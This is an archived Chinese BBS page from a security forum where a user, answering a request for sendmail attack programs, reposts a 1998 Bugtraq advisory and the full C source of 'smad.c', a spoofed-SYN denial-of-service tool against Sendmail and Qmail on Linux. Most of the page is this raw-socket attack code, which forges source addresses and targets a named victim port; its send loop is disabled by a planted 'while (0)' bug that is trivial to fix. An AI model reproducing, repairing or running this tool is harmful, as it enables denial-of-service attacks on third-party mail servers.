📄 379.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="380.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦!!!), 信区: Security <br>
标 题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>
发信站: BBS 水木清华站 (Sat Aug 5 08:50:47 2000) <br>
<br>
/* <br>
Date: Tue, 3 Nov 1998 11:35:31 +0100 <br>
From: Salvatore Sanfilippo <antirez@SECLAB.COM> <br>
To: BUGTRAQ@netspace.org <br>
Subject: Sendmail/Qmail DoS <br>
Hi, <br>
This expolit shows how Sendmail and Qmail vulnerabilities can be <br>
exploited through spoofed packets. In fact the simple algorithm proposed by <br>
Michal Zalewski can be performed in this way: <br>
1. Attacker sends SYN from port X to victim, dst_port=25, spoof_addr SPOOFHO <br>
ST (victim sends SYN/ACK to SPOOFHOST) <br>
2. SPOOFHOST sends RST from port X to victim, dst_port=25 respecting sequenc <br>
e numbers (in reply to the SYN/ACK from victim). <br>
(victim got error on accept() - and enters 5 sec 'refusingconn' mode) <br>
3. Wait approx. 2 seconds <br>
4. Go to 1. <br>
The source is for Linux and there is a little bug so it doesn't work. <br>
p.s. This DoS works only against Linux boxes because Linux accept() returns <br>
a different errno. <br>
anti. <br>
-- <br>
Salvatore Sanfilippo <br>
Intesis SECURITY LAB Phone: +39-2-671563.1 <br>
Via Settembrini, 35 Fax: +39-2-66981953 <br>
I-20124 Milano ITALY Email: antirez@seclab.com <br>
--------------------------------------------------------- <br>
*/ <br>
/* <br>
* smad.c - sendmail accept dos - <br>
* <br>
* Salvatore Sanfilippo [AntireZ] <br>
* Intesis SECURITY LAB Phone: +39-2-671563.1 <br>
* Via Settembrini, 35 Fax: +39-2-66981953 <br>
* I-20124 Milano ITALY Email: antirez@seclab.com <br>
* md5330@mclink.it <br>
* <br>
* compile it under Linux with gcc -Wall -o smad smad.c <br>
* <br>
* usage: smad fakeaddr victim [port] <br>
*/ <br>
#include <unistd.h> <br>
#include <string.h> <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <arpa/inet.h> <br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <netinet/tcp.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/in.h> <br>
#include <netdb.h> <br>
#include <unistd.h> <br>
#define SLEEP_UTIME 100000 /* modify it if necessary */ <br>
#define PACKETSIZE (sizeof(struct iphdr) + sizeof(struct tcphdr)) <br>
#define OFFSETTCP (sizeof(struct iphdr)) <br>
#define OFFSETIP (0) <br>
u_short cksum(u_short *buf, int nwords) <br>
{ <br>
unsigned long sum; <br>
u_short *w = buf; <br>
for (sum = 0; nwords > 0; nwords-=2) <br>
sum += *w++; <br>
sum = (sum >> 16) + (sum & 0xffff); <br>
sum += (sum >> 16); <br>
return ~sum; <br>
} <br>
void resolver (struct sockaddr * addr, char *hostname, u_short port) <br>
{ <br>
struct sockaddr_in *address; <br>
struct hostent *host; <br>
address = (struct sockaddr_in *)addr; <br>
(void) bzero((char *)address, sizeof(struct sockaddr_in)); <br>
address->sin_family = AF_INET; <br>
address->sin_port = htons(port); <br>
address->sin_addr.s_addr = inet_addr(hostname); <br>
if ( (int)address->sin_addr.s_addr == -1) { <br>
host = gethostbyname(hostname); <br>
if (host) { <br>
bcopy( host->h_addr, <br>
(char *)&address->sin_addr,host->h_length); <br>
} else { <br>
perror("Could not resolve address"); <br>
exit(-1); <br>
} <br>
} <br>
} <br>
} <br>
int main(int argc, char **argv) <br>
{ <br>
char runchar[] = "|/-\\"; <br>
char packet[PACKETSIZE], <br>
*fromhost, <br>
*tohost; <br>
u_short fromport = 3000, <br>
toport = 25; <br>
struct sockaddr_in local, remote; <br>
struct iphdr *ip = (struct iphdr*) (packet + OFFSETIP); <br>
struct tcphdr *tcp = (struct tcphdr*) (packet + OFFSETTCP); <br>
struct tcp_pseudohdr <br>
{ <br>
struct in_addr saddr; <br>
struct in_addr daddr; <br>
u_char zero; <br>
u_char protocol; <br>
u_short lenght; <br>
struct tcphdr tcpheader; <br>
} pseudoheader; <br>
int sock, result, runcharid = 0; <br>
if (argc < 3) <br>
{ <br>
printf("usage: %s fakeaddr victim [port]\n", argv[0]); <br>
exit(0); <br>
} <br>
if (argc == 4) <br>
toport = atoi(argv[3]); <br>
bzero((void*)packet, PACKETSIZE); <br>
fromhost = argv[1]; <br>
tohost = argv[2]; <br>
resolver((struct sockaddr*)&local, fromhost, fromport); <br>
resolver((struct sockaddr*)&remote, tohost, toport); <br>
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); <br>
if (sock == -1) { <br>
perror("can't get raw socket"); <br>
exit(1); <br>
} <br>
/* src addr */ <br>
bcopy((char*)&local.sin_addr, &ip->saddr,sizeof(ip->saddr)); <br>
/* dst addr */ <br>
bcopy((char*)&remote.sin_addr,&ip->daddr,sizeof(ip->daddr)); <br>
ip->version = 4; <br>
ip->ihl = sizeof(struct iphdr)/4; <br>
ip->tos = 0; <br>
ip->tot_len = htons(PACKETSIZE); <br>
ip->id = htons(getpid() & 255); <br>
/* no flags */ <br>
ip->frag_off = 0; <br>
ip->ttl = 64; <br>
ip->protocol = 6; <br>
ip->check = 0; <br>
tcp->th_dport = htons(toport); <br>
tcp->th_sport = htons(fromport); <br>
tcp->th_seq = htonl(32089744); <br>
tcp->th_ack = htonl(0); <br>
tcp->th_off = sizeof(struct tcphdr)/4; <br>
/* 6 bit reserved */ <br>
tcp->th_flags = TH_SYN; <br>
tcp->th_win = htons(512); <br>
/* start of pseudo header stuff */ <br>
bzero(&pseudoheader, 12+sizeof(struct tcphdr)); <br>
pseudoheader.saddr.s_addr=local.sin_addr.s_addr; <br>
pseudoheader.daddr.s_addr=remote.sin_addr.s_addr; <br>
pseudoheader.protocol = 6; <br>
pseudoheader.lenght = htons(sizeof(struct tcphdr)); <br>
bcopy((char*) tcp, (char*) &pseudoheader.tcpheader, <br>
sizeof(struct tcphdr)); <br>
/* end */ <br>
tcp->th_sum = cksum((u_short *) &pseudoheader, <br>
12+sizeof(struct tcphdr)); <br>
/* 16 bit urg */ <br>
while (0) <br>
{ <br>
result = sendto(sock, packet, PACKETSIZE, 0, <br>
(struct sockaddr *)&remote, sizeof(remote)); <br>
if (result != PACKETSIZE) <br>
{ <br>
perror("sending packet"); <br>
exit(0); <br>
} <br>
printf("\b"); <br>
printf("%c", runchar[runcharid]); <br>
fflush(stdout); <br>
runcharid++; <br>
if (runcharid == 4) <br>
runcharid = 0; <br>
usleep(SLEEP_UTIME); <br>
} <br>
return 0; <br>
} <br>
<br>
【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>
: 如题 <br>
<br>
<br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="380.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -